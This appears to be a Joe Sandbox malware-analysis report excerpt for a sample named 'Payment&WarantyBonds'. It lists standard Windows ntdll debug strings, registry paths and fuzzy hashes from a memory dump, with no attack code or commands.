                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                                                                Strings
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                                                                                • apphelp.dll, xrefs: 01822462
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                Strings
                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                                                                                • HEAP: , xrefs: 01813264
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                • API String ID: 0-617086771
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpCheckModule, xrefs: 0186A117
                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 018BC1F1
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                                                                                • PreferredUILanguages, xrefs: 018BC212
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                Strings
                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                Strings
                                                                                                                                                                                • kLsE, xrefs: 01800540
                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .mui
                                                                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0188895E
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                                                • Instruction ID: 0d64fa971943df8115d79774e07879579b806675a9eb4ded3b90b4cac03256d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                                                • Instruction Fuzzy Hash: 57D1C371A0060A9BDB14DF68C880BBBB7E5FF54314F14466DEA15DB381E734DA50CB62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction ID: ba19f1ec713c1acffe1772e406fb6381ce1e55ba25d583c00de13c1ea5d11004
                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction Fuzzy Hash: CCB1A574A006099FDF24EF98C940EABBBB9FF86304F94445DAA02D7791DB74EA05CB10
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction ID: e64c1ae80a20750c2decfa1e52cb4a9dd8695febce881101b7ce0dcae61f7e54
                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 79B1053260464AAFDB11CBA8CC50BBEBBFAAF44304F140555E652DB385DB30EB81CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                                                • Instruction ID: aa696d72eaf45fae5aedd2be7453c322dca90e00ab7e36d075bbe0d120954268
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                                                • Instruction Fuzzy Hash: C0C169706083458FD765CF19C884BABB7E9BF88304F44492DE989C7291D775EA48CF92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                                                                                • Instruction ID: 32d9118590433cd8ab0e619d56509956c61f4adbf46fc64e3cc83f45ec92865d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AB17170A002698BDB65CF58C884BAAF7B5EF44700F1485EDDA4AE7341EB309E85CB21
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 960398c9b5c8a6608d1fcf67cb578aaf578ee35e37f51f022c9f673f8542e71e
                                                                                                                                                                                • Instruction ID: 9d0bf0f7ba1b2fb3f5387d82fe87606b3d9b8e54571d35e5834b8a6e6ace2986
                                                                                                                                                                                • Opcode Fuzzy Hash: 960398c9b5c8a6608d1fcf67cb578aaf578ee35e37f51f022c9f673f8542e71e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8BA1E431E006699FEB32DB5CD854FAEBBA9AB00714F050125EB11EB291D774DF80CB95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                                                                                • Instruction ID: 8244f284fcdc8851f7e284f6592b14fe36b15207ae5dff29661b674eddceb3e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                                                                                • Instruction Fuzzy Hash: DCA1BE70A0061E9BDB25CF69C990BABB7B1FF54318F044129EB45DB281EB34EA51CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                                                                                • Instruction ID: 914468e9988467b728d7e856ac4fd8f409f97f5734f17bb9b59122712a3990ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA1CA72A04712AFC721DF18C980B5ABBE9FF48754F15062CF589DBA55D734EA00CB92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                • Instruction ID: f786fbbd803a1d3b5ac9025fb3b1e4c5aa2cce9065843312ef02fe4c6b53cda4
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                • Instruction Fuzzy Hash: CAB11771E0061ADFDF29CFADC880AADBBB6BF48314F148169E915E7355D730AA41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                                                                                • Instruction ID: 5270e3f213830114e3d4881a50b2074bdc774addb04e6985f8709b21f1e7ec2f
                                                                                                                                                                                • Opcode Fuzzy Hash: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 88917171D0061AAFDB15DF68D884BAEBFB5AF49710F254169E610EB341E734EF009BA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e8fe0b80a82a9aa696b10df5792da45ea7f82f0e1c452df6720a11d0021a4750
                                                                                                                                                                                • Instruction ID: 228bdd59d62d5c19eac54947c63d122cd11ee9a1df71b693dc136d69bcfc7cbf
                                                                                                                                                                                • Opcode Fuzzy Hash: e8fe0b80a82a9aa696b10df5792da45ea7f82f0e1c452df6720a11d0021a4750
                                                                                                                                                                                • Instruction Fuzzy Hash: 43910432A00616CFEB269B5CC480BB9BBAAEF94718F154169ED06DB288F634DB41C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                • Instruction ID: 3bd717604c67db393f02ee2e1e71d4e41df1ed753d39f7cb5ddd8f18cfee5c0f
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a79d65552feec4a25bcf26b9c116ce01f5dc7d73d28ace3034aff7b7196ee2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E516D72600A09DFCB22EF69C980E6AB3FDFF58754F44046AE551D7260E734EA50CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                                                                                • Instruction ID: aa95a29925505a6121badde1b4e5ccd70fb78d5cf0c32a118955daabc6b3433d
                                                                                                                                                                                • Opcode Fuzzy Hash: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C5147716083469FEB54DF29C880A6BBBE5BFC8308F88492DF595C7250EB70DA05CB52
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction ID: d6c1a24cce8f010816571f5bc86138bf31a801a55309653276ac3019abeb39b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 03515E75E0422EAFDB16DF98C440BEEBBB9AF45754F044069EA11EB240D774DE84CBA0
                                                                                                                                                                                Memory Dump Source
